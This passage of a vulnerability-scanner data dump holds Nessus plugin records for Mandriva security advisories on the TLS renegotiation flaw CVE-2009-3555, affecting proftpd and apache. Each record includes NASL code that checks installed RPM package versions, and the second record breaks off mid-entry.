(CVE-2009-3555).\n\nPackages for 2008.0 are provided for Corporate Desktop 2008.0\ncustomers.\n\nThis update fixes this vulnerability.", "modified": "2020-02-02T00:00:00", "id": "MANDRIVA_MDVSA-2009-337.NASL", "href": "https://www.tenable.com/plugins/nessus/43393", "published": "2009-12-23T00:00:00", "title": "Mandriva Linux Security Advisory : proftpd (MDVSA-2009:337)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2009:337. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(43393);\n script_version(\"1.18\");\n script_cvs_date(\"Date: 2019/08/02 13:32:52\");\n\n script_cve_id(\"CVE-2009-3555\");\n script_bugtraq_id(36935);\n script_xref(name:\"MDVSA\", value:\"2009:337\");\n\n script_name(english:\"Mandriva Linux Security Advisory : proftpd (MDVSA-2009:337)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A vulnerability has been identified and corrected in proftpd :\n\nThe TLS protocol, and the SSL protocol 3.0 and possibly earlier, as\nused in Microsoft Internet Information Services (IIS) 7.0, mod_ssl in\nthe Apache HTTP Server 2.2.14 and earlier, OpenSSL before 0.9.8l,\nGnuTLS 2.8.5 and earlier, Mozilla Network Security Services (NSS)\n3.12.4 and earlier, and other products, does not properly associate\nrenegotiation handshakes with an existing connection, which allows\nman-in-the-middle attackers to insert data into HTTPS sessions, and\npossibly other types of sessions protected by TLS or SSL, by sending\nan unauthenticated request that is processed retroactively by a server\nin a post-renegotiation context, related to a plaintext injection\nattack, aka the Project Mogul issue (CVE-2009-3555).\n\nPackages for 2008.0 are provided for Corporate Desktop 2008.0\ncustomers.\n\nThis update fixes this vulnerability.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://bugs.proftpd.org/show_bug.cgi?id=3324\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(310);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:proftpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:proftpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:proftpd-mod_autohost\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:proftpd-mod_ban\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:proftpd-mod_case\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:proftpd-mod_ctrls_admin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:proftpd-mod_gss\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:proftpd-mod_ifsession\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:proftpd-mod_ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:proftpd-mod_load\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:proftpd-mod_quotatab\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:proftpd-mod_quotatab_file\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:proftpd-mod_quotatab_ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:proftpd-mod_quotatab_radius\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:proftpd-mod_quotatab_sql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:proftpd-mod_radius\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:proftpd-mod_ratio\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:proftpd-mod_rewrite\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:proftpd-mod_sftp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:proftpd-mod_shaper\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:proftpd-mod_site_misc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:proftpd-mod_sql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:proftpd-mod_sql_mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:proftpd-mod_sql_postgres\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:proftpd-mod_time\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:proftpd-mod_tls\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:proftpd-mod_vroot\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:proftpd-mod_wrap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:proftpd-mod_wrap_file\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:proftpd-mod_wrap_sql\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2008.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2009.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2009.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2010.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/12/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/12/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK2008.0\", reference:\"proftpd-1.3.2-0.3mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"proftpd-devel-1.3.2-0.3mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"proftpd-mod_autohost-1.3.2-0.3mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"proftpd-mod_ban-1.3.2-0.3mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"proftpd-mod_case-1.3.2-0.3mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"proftpd-mod_ctrls_admin-1.3.2-0.3mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"proftpd-mod_gss-1.3.2-0.3mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"proftpd-mod_ifsession-1.3.2-0.3mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"proftpd-mod_ldap-1.3.2-0.3mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"proftpd-mod_load-1.3.2-0.3mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"proftpd-mod_quotatab-1.3.2-0.3mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"proftpd-mod_quotatab_file-1.3.2-0.3mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"proftpd-mod_quotatab_ldap-1.3.2-0.3mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"proftpd-mod_quotatab_radius-1.3.2-0.3mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"proftpd-mod_quotatab_sql-1.3.2-0.3mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"proftpd-mod_radius-1.3.2-0.3mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"proftpd-mod_ratio-1.3.2-0.3mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"proftpd-mod_rewrite-1.3.2-0.3mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"proftpd-mod_shaper-1.3.2-0.3mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"proftpd-mod_site_misc-1.3.2-0.3mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"proftpd-mod_sql-1.3.2-0.3mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"proftpd-mod_sql_mysql-1.3.2-0.3mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"proftpd-mod_sql_postgres-1.3.2-0.3mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"proftpd-mod_time-1.3.2-0.3mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"proftpd-mod_tls-1.3.2-0.3mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"proftpd-mod_wrap-1.3.2-0.3mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"proftpd-mod_wrap_file-1.3.2-0.3mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"proftpd-mod_wrap_sql-1.3.2-0.3mdv2008.0\", yank:\"mdv\")) flag++;\n\nif (rpm_check(release:\"MDK2009.0\", reference:\"proftpd-1.3.2-0.4mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"proftpd-devel-1.3.2-0.4mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"proftpd-mod_autohost-1.3.2-0.4mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"proftpd-mod_ban-1.3.2-0.4mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"proftpd-mod_case-1.3.2-0.4mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"proftpd-mod_ctrls_admin-1.3.2-0.4mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"proftpd-mod_gss-1.3.2-0.4mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"proftpd-mod_ifsession-1.3.2-0.4mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"proftpd-mod_ldap-1.3.2-0.4mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"proftpd-mod_load-1.3.2-0.4mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"proftpd-mod_quotatab-1.3.2-0.4mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"proftpd-mod_quotatab_file-1.3.2-0.4mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"proftpd-mod_quotatab_ldap-1.3.2-0.4mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"proftpd-mod_quotatab_radius-1.3.2-0.4mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"proftpd-mod_quotatab_sql-1.3.2-0.4mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"proftpd-mod_radius-1.3.2-0.4mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"proftpd-mod_ratio-1.3.2-0.4mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"proftpd-mod_rewrite-1.3.2-0.4mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"proftpd-mod_shaper-1.3.2-0.4mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"proftpd-mod_site_misc-1.3.2-0.4mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"proftpd-mod_sql-1.3.2-0.4mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"proftpd-mod_sql_mysql-1.3.2-0.4mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"proftpd-mod_sql_postgres-1.3.2-0.4mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"proftpd-mod_time-1.3.2-0.4mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"proftpd-mod_tls-1.3.2-0.4mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"proftpd-mod_vroot-1.3.2-0.4mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"proftpd-mod_wrap-1.3.2-0.4mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"proftpd-mod_wrap_file-1.3.2-0.4mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"proftpd-mod_wrap_sql-1.3.2-0.4mdv2009.0\", yank:\"mdv\")) flag++;\n\nif (rpm_check(release:\"MDK2009.1\", reference:\"proftpd-1.3.2-4.3mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"proftpd-devel-1.3.2-4.3mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"proftpd-mod_autohost-1.3.2-4.3mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"proftpd-mod_ban-1.3.2-4.3mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"proftpd-mod_case-1.3.2-4.3mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"proftpd-mod_ctrls_admin-1.3.2-4.3mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"proftpd-mod_gss-1.3.2-4.3mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"proftpd-mod_ifsession-1.3.2-4.3mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"proftpd-mod_ldap-1.3.2-4.3mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"proftpd-mod_load-1.3.2-4.3mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"proftpd-mod_quotatab-1.3.2-4.3mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"proftpd-mod_quotatab_file-1.3.2-4.3mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"proftpd-mod_quotatab_ldap-1.3.2-4.3mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"proftpd-mod_quotatab_radius-1.3.2-4.3mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"proftpd-mod_quotatab_sql-1.3.2-4.3mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"proftpd-mod_radius-1.3.2-4.3mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"proftpd-mod_ratio-1.3.2-4.3mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"proftpd-mod_rewrite-1.3.2-4.3mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"proftpd-mod_sftp-1.3.2-4.3mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"proftpd-mod_shaper-1.3.2-4.3mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"proftpd-mod_site_misc-1.3.2-4.3mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"proftpd-mod_sql-1.3.2-4.3mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"proftpd-mod_sql_mysql-1.3.2-4.3mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"proftpd-mod_sql_postgres-1.3.2-4.3mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"proftpd-mod_time-1.3.2-4.3mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"proftpd-mod_tls-1.3.2-4.3mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"proftpd-mod_vroot-1.3.2-4.3mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"proftpd-mod_wrap-1.3.2-4.3mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"proftpd-mod_wrap_file-1.3.2-4.3mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"proftpd-mod_wrap_sql-1.3.2-4.3mdv2009.1\", yank:\"mdv\")) flag++;\n\nif (rpm_check(release:\"MDK2010.0\", reference:\"proftpd-1.3.2b-1.2mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"proftpd-devel-1.3.2b-1.2mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"proftpd-mod_autohost-1.3.2b-1.2mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"proftpd-mod_ban-1.3.2b-1.2mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"proftpd-mod_case-1.3.2b-1.2mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"proftpd-mod_ctrls_admin-1.3.2b-1.2mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"proftpd-mod_gss-1.3.2b-1.2mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"proftpd-mod_ifsession-1.3.2b-1.2mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"proftpd-mod_ldap-1.3.2b-1.2mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"proftpd-mod_load-1.3.2b-1.2mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"proftpd-mod_quotatab-1.3.2b-1.2mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"proftpd-mod_quotatab_file-1.3.2b-1.2mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"proftpd-mod_quotatab_ldap-1.3.2b-1.2mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"proftpd-mod_quotatab_radius-1.3.2b-1.2mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"proftpd-mod_quotatab_sql-1.3.2b-1.2mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"proftpd-mod_radius-1.3.2b-1.2mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"proftpd-mod_ratio-1.3.2b-1.2mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"proftpd-mod_rewrite-1.3.2b-1.2mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"proftpd-mod_sftp-1.3.2b-1.2mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"proftpd-mod_shaper-1.3.2b-1.2mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"proftpd-mod_site_misc-1.3.2b-1.2mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"proftpd-mod_sql-1.3.2b-1.2mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"proftpd-mod_sql_mysql-1.3.2b-1.2mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"proftpd-mod_sql_postgres-1.3.2b-1.2mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"proftpd-mod_time-1.3.2b-1.2mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"proftpd-mod_tls-1.3.2b-1.2mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"proftpd-mod_vroot-1.3.2b-1.2mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"proftpd-mod_wrap-1.3.2b-1.2mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"proftpd-mod_wrap_file-1.3.2b-1.2mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"proftpd-mod_wrap_sql-1.3.2b-1.2mdv2010.0\", yank:\"mdv\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2020-02-01T00:44:51", "bulletinFamily": "scanner", "description": "A vulnerability was discovered and corrected in apache :\n\nApache is affected by SSL injection or man-in-the-middle attacks due\nto a design flaw in the SSL and/or TLS protocols. A short term\nsolution was released Sat Nov 07 2009 by the ASF team to mitigate\nthese problems. Apache will now reject in-session renegotiation\n(CVE-2009-3555).\n\nAdditionally the SNI patch was upgraded for 2009.0/MES5 and 2009.1.\n\nThis update provides a solution to this vulnerability.", "modified": "2020-02-02T00:00:00", "id": "MANDRIVA_MDVSA-2009-295.NASL", "href": "https://www.tenable.com/plugins/nessus/42429", "published": "2009-11-09T00:00:00", "title": "Mandriva Linux Security Advisory : apache (MDVSA-2009:295)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2009:295. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(42429);\n script_version(\"1.19\");\n script_cvs_date(\"Date: 2019/08/02 13:32:52\");\n\n script_cve_id(\"CVE-2009-3555\");\n script_bugtraq_id(36935);\n script_xref(name:\"MDVSA\", value:\"2009:295\");\n\n script_name(english:\"Mandriva Linux Security Advisory : apache (MDVSA-2009:295)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A vulnerability was discovered and corrected in apache :\n\nApache is affected by SSL injection or man-in-the-middle attacks due\nto a design flaw in the SSL and/or TLS protocols. A short term\nsolution was released Sat Nov 07 2009 by the ASF team to mitigate\nthese problems. Apache will now reject in-session renegotiation\n(CVE-2009-3555).\n\nAdditionally the SNI patch was upgraded for 2009.0/MES5 and 2009.1.\n\nThis update provides a solution to this vulnerability.\"\n );\n # http://marc.info/?l=apache-httpd-announce&m=125755783724966&w=2\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?6a81680c\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(310);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-htcacheclean\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_authn_dbd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_cache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_dav\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_dbd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_deflate\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_disk_cache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_file_cache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_mem_cache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_proxy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_proxy_ajp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_proxy_scgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_userdir\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-modules\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mpm-event\");\n script_set_attribute(attribute:\"cpe\", 